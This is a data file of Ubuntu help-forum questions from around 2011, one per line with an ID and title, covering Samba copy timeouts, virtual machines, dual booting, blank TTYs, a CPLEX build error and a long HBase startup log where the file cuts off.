43364	why does samba always time-out whilst copying a large file off a network share ?	i 'm running ubuntu 11.04 ( natty ) , kernel 2.6.38-8-generic , gnome 2.32.1 . edit : as of 3 april 2012 i 'm now on kernel 2.6.38-13-generic ( still same ubuntu and gnome ) . the problem still persists . i have a synology diskstation ds207 nas connected to my home network . both of these devices are connected to the network via wired gigabit ethernet . i access the nas via samba on the ubuntu box . my problem is that every time i try to copy a large file from one of the nas 's samba shares to the desktop on the ubuntu box using nautilus , the operation times-out and fails about a third of the way through the copy ( roughly about 3 mins into the operation ) . i have retried the copy 3 times and the same thing has happened every time . however , i also have a windows 7 installation on a different drive in the same pc as the ubuntu install , and if i boot into windows 7 and try to copy the file using that os instead then it works perfectly . this proves ( to me at least ) that the file and the network connection and hardware are actually all fine . so does anyone have any ideas about what might be going wrong when trying to copy the file in ubuntu ? is there simply a `` samba keep-alive '' setting or similar that i need to set somewhere ? by the way , here 's a screenshot of the error i get :
43365	creating & running windows virtual machines ?	what 's the recommended way to run virtualised windows environment on top of ubuntu nowadays ? i need to create new windows virtual machines too , not only use existing ones , so , to my understanding , vmware player would not be enough . i 've used vmware server earlier , but i 'm having too many problems getting its latest version to work on latest ubuntu ( 11.04 ) ... probably related to this : vmware has declared vmware server end of availability on january 2010 with the actual support ending on june 30th , 2011 . [ ... ] furthermore , vmware server is not officially supported on ubuntu releases greater than 8.04 . so , are there any good alternatives to vmware server ?
43367	rhythmbox opens out of focus from sound menu	i 'm using ubuntu natty , though i had noticed this problem in maverick as well . because rhythmbox opens up out of focus , pressing ctrl-w/ctrl-q has the alarming effect of shutting down whatever application was behind rhythmbox ; in my case , generally firefox . since nobody else seems to be experiencing this problem , could it be a problem my end ?
43369	unity launcher does n't hide automatically on start up	when you start an application , say , firefox , the launcher continues to be placed over it . this is cleared up by moving the mouse to the left edge of the screen and then away , but it should n't happen in the first place .
43374	power management - sleep / wake up server when accessed	i have a headless hp proliant microserver with ubuntu installed . this machine has samba shares on it serving media and i usually rdp or ssh into it . now my issue is i want the machine to go into sleep mode ( so the state is saved from ram to the harddrive ) and it will seem like it is turned off after an hour of idling . if there is any attempt to access the samba share through lan i would like it to wake up . now my motherboard supports this function , can anyone point me in the right direction for achieving this easily ? thanks
43375	windows 7 proper dual boot with ubuntu , ubuntu installer not detecting windows	i want to set up ubuntu for use as my student computer in order to remove all those gaming distractions and focus on actual productive things . i am currently running : windows 7 home premium 64 bit 8gb ddr3 ram asrock p67 pro3 motherboard intel core i5 2500 ati saphire 5850 western digital green 1tb hdd wd green 500gb hdd and i want to install ubuntu 32 bit ( i was going to get 64 bit , but i 'm now capped for 2 weeks and ca n't wait that long ) 11.04 . so i burned the install disk , and before i restarted , i went into the windows disk management and shrunk the 1tb hdd ( i have windows 7 installed on this ) by 60gb for ubuntu , note i did n't format that 60gb space . then i restarted , booted from the cd , and selected install ubuntu , there was no windows 7 detected and no install along side windows 7 option . this made me go into custom to set some stuff up : i made the 60gb ext4 , set it as root , and tried to install anyway . this did not work : windows booted like normal . when i go to reinstall ubuntu , it detects the other ubuntu install , and offers the option to install side by side or erase , but still does n't detect windows . i searched on the internet for a solution and it seems the most successful way is to change my partition table system from efi ( which it is in ... i am pretty sure , according to windows disk management ) to the older type ( which i have forgotten what that is exactly ) . i am not against doing this , but i do n't want to lose any performance with windows 7 or damage my windows install . once again , i want to get the ubuntu installer detecting my windows install so i can dual boot .
43377	error 'render ring head forced to zero '	i have encountered this error message quite a few times now , usually at startup : *error* render ring head forced to zero . it does n't actually seem to affect anything , in my experience . i was just curious about what the message means .
43378	any one experienced problem installing ( ilog/ibm ) 's cplex ?	this was working on 10.04 , but now i ca n't get it to work again ... . cplex seem to be properly installed ( though if anyone can suggest a way to insure this is indeed the case , i 'd be thankful ) any idea ? cplexdir=/root/ilog/cplex_studio_academicresearch122/cplex system=x86-64_sles10_4.1 libformat=static_pic # copt = -m64 -fpic # cflags = $ ( copt ) -i $ ( cplexincdir ) cplexlibdir= $ cplexdir/lib/ $ system/ $ libformat # clnflags = -l $ ( cplexlibdir ) -lcplex -lm -pthread r cmd install \ -- configure-args= '' -- with-cplex-include= $ cplexlibdir \ -- with-cplex-cflags=-fpic \ -- with-cplex-lib='-l $ cplexlibdir/static_pic \ -lcplex -lm -lpthread ' '' ~/documents/rcplex_0.3-0.tar.gz * installing to library ‘~/r/x86_64-pc-linux-gnu-library/2.12’ * installing *source* package ‘rcplex’ ... checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking how to run the c preprocessor ... gcc -e checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for ansi c header files ... no checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking ilcplex/cplex.h usability ... no checking ilcplex/cplex.h presence ... no checking for ilcplex/cplex.h ... no configure : error : cplex header cplex.h not found error : configuration failed for package ‘rcplex’ * removing ‘~/r/x86_64-pc-linux-gnu-library/2.12/rcplex’ however , when i check cd cd /root/ilog/cplex_studio_academicresearch122/cplex/include/ilcplex ls cplex.h ilm.h ilocarray.h ilocplex.h ilocplexi.h iloextrmgr.h ilogoals.h solution.xsd solution.xsl
43386	how do i get my blacked out ttys back ?	original question : after i replaced my ubuntu 10.10 with 11.04 all i get when i ctrl+alt+f1–f6 into a tty is a black screen . also when i boot there 's a while of black screen after grub2 menu is displayed . then until just before gnome starts it stays black . i have an nvida geforce quadro fx 770m on my hp elitebook 8530w . how do i get my ttys ( aka 'virtual terminals ' ) to work again ? my efforts in chronological order : so grub and gfx-payload seems to be the problem , i figured . i went along with this guide for higher tty resolution . which led to the grub2 menu displaying in my native resolution rather than 800x600 . the black screen problem remains . i googlehit some bugreports on other nvidia cards having that problem . i tried uninstalling the nvidia driver . no effect . also tried different resolutions with an older version of the kernel it works . though not perfectly . the ttys are usable , black screen between grub2 menu and gnome start remains . not really a solution . tried so much , that i lost track . reinstalled grub2 and linux-image-2.6.38-8-generic . then did this to my /etc/default/grub in accordance with the aforementioned guide ( /etc/grub.d/00_header edited as well ) : grub_default=0 grub_hidden_timeout=0 # grub_hidden_timeout_quiet=true grub_timeout=3 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` # grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' grub_gfxmode=1680x1050x32 to my surprise i can now use my ttys in native resolution . black screen between grub2 menu and gnome login screen is still there though . that is annoying since i also use an encrypted disk thus having to enter my passphrase in total dark ... still looking for a solution but urgency is low . downloaded and installed a later version of nvidia driver . no difference to last edit . tried grub_cmdline_linux= '' vga= '' -parameter . no effect . nomodeset has no effect . not even in combination with vga= ... tried echo framebuffer=y > /etc/initramfs-tools/conf.d/splash no effect ( see comment ) on the verge of resignation ... bounty period soon to end .
43389	where can i download the intel c++ compiler ?	i read somewhere that intel c++ is free for non-professional use . but the intel site www.software.intel.com has no option for free download . it provides the 30 days trial version and need to buy license key or further use . does anyone has the knowledge about this ? if yes please provide the link to download free version .
43390	how to send a mail on a click ?	i just want to send a mail automatically on clicking an icon . i want to attach ping and trace report automatically with time stamp to some of the email address with some text in the message body . is it possible ? i am using thunderbird as my email client with ubuntu 10.10 .
43393	what if i do n't have a bashrc ?	will i be able to login ? what havoc will it cause , if any ? how will it mess up m terminal ? there are login and non-login terminals too . how will it affect those ?
43399	are there any unwanted gnome libraries for a unity user ?	my /usr volume has run out of space . are there any libraries from gnome that is safe to remove . i am using unity and i do n't think i will need to use 'ubuntu classic ' again . i used apt-get autoremove and clean , but there were no unused libraries . are there any apps that might not be needed ? thank you..
43405	suggest mp3 player having minimum requirements	please suggest an mp3 player which does the following things apart from play , pause , next & previous . i 'm not looking for all the equalizer & stuff . just playing & option to enqueue at one click is good for me . enqueue on double click/enter or enqueue on right click on the file ( like in windows for winamp & foobar ) . does n't save the previous playlist hotkey or laptop key support ( optional ) simple gui please do n't suggest amarok & exaile as it 's buggy with 10.04 . currently i 'm using deadbeef , which i liked , but looking for enqueue option as i 'm tired of drag & drop .
43408	gconf for lubuntu ?	does gconf have any affect on lubuntu-desktop config ? or does the `` g '' in `` gconf '' mean `` gnome '' , meaning that it 's gnome-only ? or am i missing something ? reason i 'm asking is because i made an edit in gconf for my trackpad , and it does n't appear to be taking affect in lubuntu , only in gnome .
43410	ca n't see incoming messages in empathy and skype	i have stalled skype for empathy but only outgoing messages work . when i try to chat to friends i ca n't see their messages . how do i fix this ?
43412	is there a theme that reprises the old sun sparc style interface ?	something like the following : or
43413	how do i get my laptop 's line in inlet to output sound ?	i have a laptop - dell studio 1773 , but i 'm pretty sure the model does not matter . one of it 's features i love most is the fact it has two headphone outputs . this means ubuntu can use them to output 4.0 sound . but 4.0 is not enough for me . i would like to get 5.1 surround output . at first sight it seemed impossible for me , but it turned out it is technically possible . the laptop has two audio outputs and one audio input . if the input could somehow output sound , i would get 5.1 surround sound , right ? the laptop had windows vista preinstalled . and it had a preinstalled app for tuning my sound 's parameters ( volume , basic filters etc. ) . i found out this app is able to output 5.1 sound , using the line in as output ( to be precise : it used it for center/sub channels ) ! that leads to conclusion it is somehow possible to get the line in to work as output . how can i do this in ubuntu ? as the preinstalled application proved , the soundcard is capable of outputting audio through what seemed to be an input inlet . but in ubuntu it behaves only as input . - now , my question is : is there any way i can change this , and force my system to do similar trick and output 5.1 audio using 2 headphone outlets , and 1 audio input inlet ?
43417	silverlight 3 streaming via future moonlight version ?	i am trying to watch a streaming service that requires silverlight 3 . although i installed moonlight and the browser plugin , i just get a warning that since my url is silverlight 3 , it may not fully work . but i get nothing . are there any plans to support silverlight 3 in future versions of moonlight ? cheers
43419	hbase 0.90.2 does n't start	yo ! it seems that something was changed in 11.04 because hbase could n't start on 11.04 from the default distribution , but works on 10.10. here 's the logs : 2011-05-17 18:30:24,369 info org.apache.zookeeper.zookeeper : client environment : java.io.tmpdir=/tmp 2011-05-17 18:30:24,369 info org.apache.zookeeper.zookeeper : client environment : java.compiler= < na > 2011-05-17 18:30:24,369 info org.apache.zookeeper.zookeeper : client environment : os.name=linux 2011-05-17 18:30:24,369 info org.apache.zookeeper.zookeeper : client environment : os.arch=amd64 2011-05-17 18:30:24,369 info org.apache.zookeeper.zookeeper : client environment : os.version=2.6.38-8-generic 2011-05-17 18:30:24,369 info org.apache.zookeeper.zookeeper : client environment : user.name=sbos 2011-05-17 18:30:24,369 info org.apache.zookeeper.zookeeper : client environment : user.home=/home/sbos 2011-05-17 18:30:24,369 info org.apache.zookeeper.zookeeper : client environment : user.dir=/home/sbos/downloads/hbase-0.90.2 2011-05-17 18:30:24,370 info org.apache.zookeeper.zookeeper : initiating client connection , connectstring=localhost:2181 sessiontimeout=180000 watcher=master:32910 2011-05-17 18:30:24,377 info org.apache.zookeeper.clientcnxn : opening socket connection to server localhost/127.0.0.1:2181 2011-05-17 18:30:24,377 info org.apache.zookeeper.server.nioservercnxn : accepted socket connection from /127.0.0.1:35778 2011-05-17 18:30:24,378 info org.apache.zookeeper.clientcnxn : socket connection established to localhost/127.0.0.1:2181 , initiating session 2011-05-17 18:30:24,382 info org.apache.zookeeper.server.nioservercnxn : client attempting to establish new session at /127.0.0.1:35778 2011-05-17 18:30:24,383 info org.apache.zookeeper.server.persistence.filetxnlog : creating new log file : log.1 2011-05-17 18:30:24,431 info org.apache.zookeeper.server.nioservercnxn : established session 0x12ffe5d64cb0000 with negotiated timeout 40000 for client /127.0.0.1:35778 2011-05-17 18:30:24,431 info org.apache.zookeeper.clientcnxn : session establishment complete on server localhost/127.0.0.1:2181 , sessionid = 0x12ffe5d64cb0000 , negotiated timeout = 40000 2011-05-17 18:30:24,477 info org.apache.hadoop.metrics.jvm.jvmmetrics : initializing jvm metrics with processname=master , sessionid=malta:32910 2011-05-17 18:30:24,483 info org.apache.hadoop.hbase.metrics : metricsstring added : revision 2011-05-17 18:30:24,483 info org.apache.hadoop.hbase.metrics : metricsstring added : hdfsuser 2011-05-17 18:30:24,483 info org.apache.hadoop.hbase.metrics : metricsstring added : hdfsdate 2011-05-17 18:30:24,483 info org.apache.hadoop.hbase.metrics : metricsstring added : hdfsurl 2011-05-17 18:30:24,483 info org.apache.hadoop.hbase.metrics : metricsstring added : date 2011-05-17 18:30:24,483 info org.apache.hadoop.hbase.metrics : metricsstring added : hdfsrevision 2011-05-17 18:30:24,483 info org.apache.hadoop.hbase.metrics : metricsstring added : user 2011-05-17 18:30:24,483 info org.apache.hadoop.hbase.metrics : metricsstring added : hdfsversion 2011-05-17 18:30:24,483 info org.apache.hadoop.hbase.metrics : metricsstring added : url 2011-05-17 18:30:24,483 info org.apache.hadoop.hbase.metrics : metricsstring added : version 2 011-05-17 18:30:24,483 info org.apache.hadoop.hbase.metrics : new mbeaninfo 2011-05-17 18:30:24,483 info org.apache.hadoop.hbase.metrics : new mbeaninfo 2011-05-17 18:30:24,483 info org.apache.hadoop.hbase.master.metrics.mastermetrics : initialized 2011-05-17 18:30:24,500 info org.apache.zookeeper.zookeeper : initiating client connection , connectstring=localhost:2181 sessiontimeout=180000 watcher=hconnection 2011-05-17 18:30:24,501 info org.apache.zookeeper.clientcnxn : opening socket connection to server localhost/127.0.0.1:2181 2011-05-17 18:30:24,501 info org.apache.zookeeper.clientcnxn : socket connection established to localhost/127.0.0.1:2181 , initiating session 2011-05-17 18:30:24,501 info org.apache.zookeeper.server.nioservercnxn : accepted socket connection from /127.0.0.1:35779 2011-05-17 18:30:24,501 info org.apache.zookeeper.server.nioservercnxn : client attempting to establish new session at /127.0.0.1:35779 2011-05-17 18:30:24,508 info org.apache.zookeeper.server.nioservercnxn : established session 0x12ffe5d64cb0001 with negotiated timeout 40000 for client /127.0.0.1:35779 2011-05-17 18:30:24,509 info org.apache.zookeeper.clientcnxn : session establishment complete on server localhost/127.0.0.1:2181 , sessionid = 0x12ffe5d64cb0001 , negotiated timeout = 40000 2011-05-17 18:30:24,510 info org.apache.zookeeper.server.preprequestprocessor : got user-level keeperexception when processing sessionid:0x12ffe5d64cb0001 type : create cxid:0x1 zxid:0xfffffffffffffffe txntype : unknown reqpath : n/a error path : /hbase error : keepererrorcode = nodeexists for /hbase 2011-05-17 18:30:24,517 info org.apache.zookeeper.server.preprequestprocessor : got user-level keeperexception when processing sessionid:0x12ffe5d64cb0001 type : create cxid:0x2 zxid:0xfffffffffffffffe txntype : unknown reqpath : n/a error path : /hbase/unassigned error : keepererrorcode = nodeexists for /hbase/unassigned 2011-05-17 18:30:24,525 info org.apache.zookeeper.server.preprequestprocessor : got user-level keeperexception when processing sessionid:0x12ffe5d64cb0001 type : create cxid:0x3 zxid:0xfffffffffffffffe txntype : unknown reqpath : n/a error path : /hbase/rs error : keepererrorcode = nodeexists for /hbase/rs 2011-05-17 18:30:24,533 info org.apache.zookeeper.server.preprequestprocessor : got user-level keeperexception when processing sessionid:0x12ffe5d64cb0001 type : create cxid:0x4 zxid:0xfffffffffffffffe txntype : unknown reqpath : n/a error path : /hbase/table error : keepererrorcode = nodeexists for /hbase/table 2011-05-17 18:30:24,548 info org.apache.hadoop.hbase.ipc.hbaserpcmetrics : initializing rpc metrics with hostname=hregionserver , port=57656 2011-05-17 18:30:24,560 info org.apache.hadoop.hbase.security.user : skipping login , not running on secure hadoop 2011-05-17 18:30:24,562 info org.apache.zookeeper.zookeeper : initiating client connection , connectstring=localhost:2181 sessiontimeout=180000 watcher=regionserver:57656 2011-05-17 18:30:24,563 info org.apache.zookeeper.clientcnxn : opening socket connection to server localhost/127.0.0.1:2181 2011-05-17 18:30:24,563 info org.apache.zookeeper.clientcnxn : socket connection established to localhost/127.0.0.1:2181 , initiating session 2011-05-17 18:30:24,563 info org.apache.zookeeper.server.nioservercnxn : accepted socket connection from /127.0.0.1:35780 2011-05-17 18:30:24,563 info org.apache.zookeeper.server.nioservercnxn : client attempting to establish new session at /127.0.0.1:35780 2011-05-17 18:30:24,568 info org.apache.hadoop.hbase.master.activemastermanager : master=malta:32910 2011-05-17 18:30:24,575 info org.apache.zookeeper.server.nioservercnxn : established session 0x12ffe5d64cb0002 with negotiated timeout 40000 for client /127.0.0.1:35780 2011-05-17 18:30:24,576 info org.apache.zookeeper.server.preprequestprocessor : got user-level keeperexception when processing sessionid:0x12ffe5d64cb0002 type : create cxid:0x1 zxid:0xfffffffffffffffe txntype : unknown reqpath : n/a error path : /hbase error : keepererrorcode = nodeexists for /hbase 2011-05-17 18:30:24,576 info org.apache.zookeeper.clientcnxn : session establishment complete on server localhost/127.0.0.1:2181 , sessionid = 0x12ffe5d64cb0002 , negotiated timeout = 40000 2011-05-17 18:30:24,584 info org.apache.zookeeper.server.preprequestprocessor : got user-level keeperexception when processing sessionid:0x12ffe5d64cb0002 type : create cxid:0x2 zxid:0xfffffffffffffffe txntype : unknown reqpath : n/a error path : /hbase/unassigned error : keepererrorcode = nodeexists for /hbase/unassigned 2011-05-17 18:30:24,592 info org.apache.zookeeper.server.preprequestprocessor : got user-level keeperexception when processing sessionid:0x12ffe5d64cb0002 type : create cxid:0x3 zxid:0xfffffffffffffffe txntype : unknown reqpath : n/a error path : /hbase/rs error : keepererrorcode = nodeexists for /hbase/rs 2011-05-17 18:30:24,602 info org.apache.zookeeper.server.preprequestprocessor : got user-level keeperexception when processing sessionid:0x12ffe5d64cb0002 type : create cxid:0x4 zxid:0xfffffffffffffffe txntype : unknown reqpath : n/a error path : /hbase/table error : keepererrorcode = nodeexists for /hbase/table 2011-05-17 18:30:24,680 info org.apache.zookeeper.zookeeper : initiating client connection , connectstring=localhost:2181 sessiontimeout=180000 watcher=hconnection 2011-05-17 18:30:24,680 info org.apache.zookeeper.clientcnxn : opening socket connection to server localhost/127.0.0.1:2181 2011-05-17 18:30:24,681 info org.apache.zookeeper.server.nioservercnxn : accepted socket connection from /127.0.0.1:35781 2011-05-17 18:30:24,681 info org.apache.zookeeper.clientcnxn : socket connection established to localhost/127.0.0.1:2181 , initiating session 2 011-05-17 18:30:24,681 info org.apache.zookeeper.server.nioservercnxn : client attempting to establish new session at /127.0.0.1:35781 2011-05-17 18:30:24,692 info org.apache.zookeeper.server.nioservercnxn : established session 0x12ffe5d64cb0003 with negotiated timeout 40000 for client /127.0.0.1:35781 2011-05-17 18:30:24,692 info org.apache.zookeeper.clientcnxn : session establishment complete on server localhost/127.0.0.1:2181 , sessionid = 0x12ffe5d64cb0003 , negotiated timeout = 40000 2011-05-17 18:30:24,692 info org.apache.zookeeper.server.preprequestprocessor : got user-level keeperexception when processing sessionid:0x12ffe5d64cb0003 type : create cxid:0x1 zxid:0xfffffffffffffffe txntype : unknown reqpath : n/a error path : /hbase error : keepererrorcode = nodeexists for /hbase 2011-05-17 18:30:24,700 info org.apache.zookeeper.server.preprequestprocessor : got user-level keeperexception when processing sessionid:0x12ffe5d64cb0003 type : create cxid:0x2 zxid:0xfffffffffffffffe txntype : unknown reqpath : n/a error path : /hbase/unassigned error : keepererrorcode = nodeexists for /hbase/unassigned 2011-05-17 18:30:24,708 info org.apache.zookeeper.server.preprequestprocessor : got user-level keeperexception when processing sessionid:0x12ffe5d64cb0003 type : create cxid:0x3 zxid:0xfffffffffffffffe txntype : unknown reqpath : n/a error path : /hbase/rs error : keepererrorcode = nodeexists for /hbase/rs 2011-05-17 18:30:24,717 info org.apache.zookeeper.server.preprequestprocessor : got user-level keeperexception when processing sessionid:0x12ffe5d64cb0003 type : create cxid:0x4 zxid:0xfffffffffffffffe txntype : unknown reqpath : n/a error path : /hbase/table error : keepererrorcode = nodeexists for /hbase/table 2011-05-17 18:30:24,733 debug org.apache.hadoop.hbase.catalog.catalogtracker : starting catalog tracker org.apache.hadoop.hbase.catalog.catalogtracker @ 18330bf 2011-05-17 18:30:24,769 info org.apache.hadoop.hbase.master.hmaster : server active/primary master ; malta:32910 , sessionid=0x12ffe5d64cb0000 , cluster-up flag was=false 2011-05-17 18:30:24,770 debug org.apache.hadoop.hbase.executor.executorservice : starting executor service name=master_open_region-malta:32910 , corepoolsize=5 , maxpoolsize=5 2011-05-17 18:30:24,770 debug org.apache.hadoop.hbase.executor.executorservice : starting executor service name=master_close_region-malta:32910 , corepoolsize=5 , maxpoolsize=5 2011-05-17 18:30:24,771 debug org.apache.hadoop.hbase.executor.executorservice : starting executor service name=master_server_operations-malta:32910 , corepoolsize=3 , maxpoolsize=3 2011-05-17 18:30:24,771 debug org.apache.hadoop.hbase.executor.executorservice : starting executor service name=master_meta_server_operations-malta:32910 , corepoolsize=5 , maxpoolsize=5 2011-05-17 18:30:24,771 debug org.apache.hadoop.hbase.executor.executorservice : starting executor service name=master_table_operations-malta:32910 , corepoolsize=1 , maxpoolsize=1 2011-05-17 18:30:24,772 debug org.apache.hadoop.hbase.master.logcleaner : add log cleaner in chain : org.apache.hadoop.hbase.master.timetolivelogcleaner 2011-05-17 18:30:24,849 debug org.apache.hadoop.hbase.catalog.catalogtracker : starting catalog tracker org.apache.hadoop.hbase.catalog.catalogtracker @ 24988707 2011-05-17 18:30:24,852 info org.apache.hadoop.hbase.regionserver.memstoreflusher : globalmemstorelimit=398.4m , globalmemstorelimitlowmark=348.6m , maxheap=995.9m 2011-05-17 18:30:24,854 debug org.apache.hadoop.hbase.regionserver.prioritycompactionqueue : create prioritycompactionqueue 2011-05-17 18:30:24,854 info org.apache.hadoop.hbase.regionserver.hregionserver : runs every 10000000ms 2011-05-17 18:30:24,933 info org.apache.hadoop.hbase.regionserver.hregionserver : attempting connect to master server at malta:32910 2011-05-17 18:30:24,990 info org.mortbay.log : logging to org.slf4j.impl.log4jloggeradapter ( org.mortbay.log ) via org.mortbay.log.slf4jlog 2011-05-17 18:30:25,038 info org.apache.hadoop.hbase.regionserver.hregionserver : master is n't available yet , retrying 2011-05-17 18:30:25,055 info org.apache.hadoop.http.httpserver : port returned by webserver.getconnectors ( ) [ 0 ] .getlocalport ( ) before open ( ) is -1 . opening the listener on 60010 2011-05-17 18:30:25,056 info org.apache.hadoop.http.httpserver : listener.getlocalport ( ) returned 60010 webserver.getconnectors ( ) [ 0 ] .getlocalport ( ) returned 60010 2011-05-17 18:30:25,056 info org.apache.hadoop.http.httpserver : jetty bound to port 60010 2011-05-17 18:30:25,056 info org.mortbay.log : jetty-6.1.26 2011-05-17 18:30:25,440 info org.mortbay.log : started selectchannelconnector @ 0.0.0.0:60010 2011-05-17 18:30:25,440 debug org.apache.hadoop.hbase.master.hmaster : started service threads 2011-05-17 18:30:26,941 info org.apache.hadoop.hbase.master.servermanager : waiting on regionserver ( s ) to checkin 2011-05-17 18:30:28,038 info org.apache.hadoop.hbase.regionserver.hregionserver : attempting connect to master server at malta:32910 2011-05-17 18:30:28,039 info org.apache.hadoop.hbase.regionserver.hregionserver : connected to master at malta:32910 2011-05-17 18:30:28,047 info org.apache.hadoop.hbase.regionserver.hregionserver : telling master at malta:32910 that we are up 2011-05-17 18:30:28,048 info org.apache.hadoop.hbase.master.servermanager : registering server=localhost,57656,1305642624559 , regioncount=0 , userload=false 2011-05-17 18:30:28,053 info org.apache.hadoop.hbase.regionserver.hregionserver : master passed us address to use . was=malta:57656 , now=localhost:57656 2011-05-17 18:30:28,053 debug org.apache.hadoop.hbase.regionserver.hregionserver : config from master : fs.default.name=file : /// 2011-05-17 18:30:28,053 debug org.apache.hadoop.hbase.regionserver.hregionserver : config from master : hbase.rootdir=file : ///tmp/hbase-sbos/hbase 2011-05-17 18:30:28,055 debug org.apache.hadoop.hbase.regionserver.hregionserver : logdir=file : /tmp/hbase-sbos/hbase/.logs/localhost,57656,1305642624559 2011-05-17 18:30:28,057 info org.apache.hadoop.hbase.regionserver.wal.hlog : hlog configuration : blocksize=32 mb , rollsize=30.4 mb , enabled=true , flushlogentries=1 , optionallogflushinternal=1000ms 2011-05-17 18:30:28,140 info org.apache.hadoop.hbase.regionserver.wal.sequencefilelogwriter : syncfs -- hdfs-200 -- not available , dfs.support.append=false 2011-05-17 18:30:28,140 info org.apache.hadoop.hbase.regionserver.wal.hlog : new hlog /tmp/hbase-sbos/hbase/.logs/localhost,57656,1305642624559/localhost % 3a57656.1305642628057 2011-05-17 18:30:28,140 info org.apache.hadoop.hbase.regionserver.wal.hlog : getnumcurrentreplicas -- hdfs-826 not available ; hdfs_out=org.apache.hadoop.fs.checksumfilesystem $ checksumfsoutputsummer @ 60a415a3 , exception=org.apache.hadoop.fs.checksumfilesystem $ checksumfsoutputsummer.getnumcurrentreplicas ( ) 2011-05-17 18:30:28,144 info org.apache.hadoop.metrics.jvm.jvmmetrics : can not initialize jvm metrics with processname=regionserver , sessionid=regionserver:0 ; malta,57656,1305642624559 - already initialized 2011-05-17 18:30:28,145 info org.apache.hadoop.hbase.metrics : new mbeaninfo 2011-05-17 18:30:28,145 info org.apache.hadoop.hbase.regionserver.metrics.regionservermetrics : initialized 2011-05-17 18:30:28,147 debug org.apache.hadoop.hbase.executor.executorservice : starting executor service name=rs_open_region-localhost,57656,1305642624559 , corepoolsize=3 , maxpoolsize=3 2011-05-17 18:30:28,147 debug org.apache.hadoop.hbase.executor.executorservice : starting executor service name=rs_open_root-localhost,57656,1305642624559 , corepoolsize=1 , maxpoolsize=1 2011-05-17 18:30:28,147 debug org.apache.hadoop.hbase.executor.executorservice : starting executor service name=rs_open_meta-localhost,57656,1305642624559 , corepoolsize=1 , maxpoolsize=1 2011-05-17 18:30:28,147 debug org.apache.hadoop.hbase.executor.executorservice : starting executor service name=rs_close_region-localhost,57656,1305642624559 , corepoolsize=3 , maxpoolsize=3 2011-05-17 18:30:28,147 debug org.apache.hadoop.hbase.executor.executorservice : starting executor service name=rs_close_root-localhost,57656,1305642624559 , corepoolsize=1 , maxpoolsize=1 2011-05-17 18:30:28,147 debug org.apache.hadoop.hbase.executor.executorservice : starting executor service name=rs_close_meta-localhost,57656,1305642624559 , corepoolsize=1 , maxpoolsize=1 2011-05-17 18:30:28,168 info org.apache.hadoop.http.httpserver : port returned by webserver.getconnectors ( ) [ 0 ] .getlocalport ( ) before open ( ) is -1 . opening the listener on 60030 2011-05-17 18:30:28,168 info org.apache.hadoop.http.httpserver : listener.getlocalport ( ) returned 60030 webserver.getconnectors ( ) [ 0 ] .getlocalport ( ) returned 60030 2011-05-17 18:30:28,168 info org.apache.hadoop.http.httpserver : jetty bound to port 60030 2011-05-17 18:30:28,168 info org.mortbay.log : jetty-6.1.26 2011-05-17 18:30:28,268 info org.mortbay.log : started selectchannelconnector @ 0.0.0.0:60030 2011-05-17 18:30:28,303 info org.apache.hadoop.ipc.hbaseserver : ipc server responder : starting 2011-05-17 18:30:28,303 info org.apache.hadoop.ipc.hbaseserver : ipc server listener on 57656 : starting 2011-05-17 18:30:28,314 info org.apache.hadoop.ipc.hbaseserver : ipc server handler 0 on 57656 : starting 2011-05-17 18:30:28,319 info org.apache.hadoop.ipc.hbaseserver : ipc server handler 1 on 57656 : starting 2011-05-17 18:30:28,325 info org.apache.hadoop.ipc.hbaseserver : ipc server handler 3 on 57656 : starting 2011-05-17 18:30:28,325 info org.apache.hadoop.ipc.hbaseserver : ipc server handler 2 on 57656 : starting 2011-05-17 18:30:28,348 info org.apache.hadoop.ipc.hbaseserver : ipc server handler 4 on 57656 : starting 2011-05-17 18:30:28,349 info org.apache.hadoop.ipc.hbaseserver : ipc server handler 6 on 57656 : starting 2011-05-17 18:30:28,349 info org.apache.hadoop.ipc.hbaseserver : ipc server handler 5 on 57656 : starting 2011-05-17 18:30:28,359 info org.apache.hadoop.ipc.hbaseserver : ipc server handler 8 on 57656 : starting 2011-05-17 18:30:28,369 info org.apache.hadoop.ipc.hbaseserver : ipc server handler 9 on 57656 : starting 2011-05-17 18:30:28,379 info org.apache.hadoop.ipc.hbaseserver : pri ipc server handler 0 on 57656 : starting 2011-05-17 18:30:28,389 info org.apache.hadoop.ipc.hbaseserver : pri ipc server handler 1 on 57656 : starting 2011-05-17 18:30:28,399 info org.apache.hadoop.ipc.hbaseserver : pri ipc server handler 2 on 57656 : starting 2011-05-17 18:30:28,404 info org.apache.hadoop.ipc.hbaseserver : pri ipc server handler 3 on 57656 : starting 2011-05-17 18:30:28,419 info org.apache.hadoop.ipc.hbaseserver : pri ipc server handler 4 on 57656 : starting 2011-05-17 18:30:28,429 info org.apache.hadoop.ipc.hbaseserver : pri ipc server handler 5 on 57656 : starting 2011-05-17 18:30:28,430 info org.apache.hadoop.ipc.hbaseserver : ipc server handler 7 on 57656 : starting 2011-05-17 18:30:28,431 info org.apache.hadoop.ipc.hbaseserver : pri ipc server handler 6 on 57656 : starting 2011-05-17 18:30:28,439 info org.apache.hadoop.ipc.hbaseserver : pri ipc server handler 7 on 57656 : starting 2011-05-17 18:30:28,439 info org.apache.hadoop.ipc.hbaseserver : pri ipc server handler 8 on 57656 : starting 2011-05-17 18:30:28,439 info org.apache.hadoop.hbase.regionserver.hregionserver : serving as localhost,57656,1305642624559 , rpc listening on /127.0.1.1:57656 , sessionid=0x12ffe5d64cb0002 2011-05-17 18:30:28,441 info org.apache.hadoop.hbase.master.servermanager : waiting on regionserver ( s ) count to settle ; currently=1 2011-05-17 18:30:28,442 info org.apache.hadoop.hbase.regionserver.storefile : allocating lrublockcache with maximum size 199.2m 2011-05-17 18:30:28,453 info org.apache.hadoop.ipc.hbaseserver : pri ipc server handler 9 on 57656 : starting 2011-05-17 18:30:29,941 info org.apache.hadoop.hbase.master.servermanager : finished waiting for regionserver count to settle ; count=1 , sleptfor=4500 2011-05-17 18:30:29,942 info org.apache.hadoop.hbase.master.servermanager : 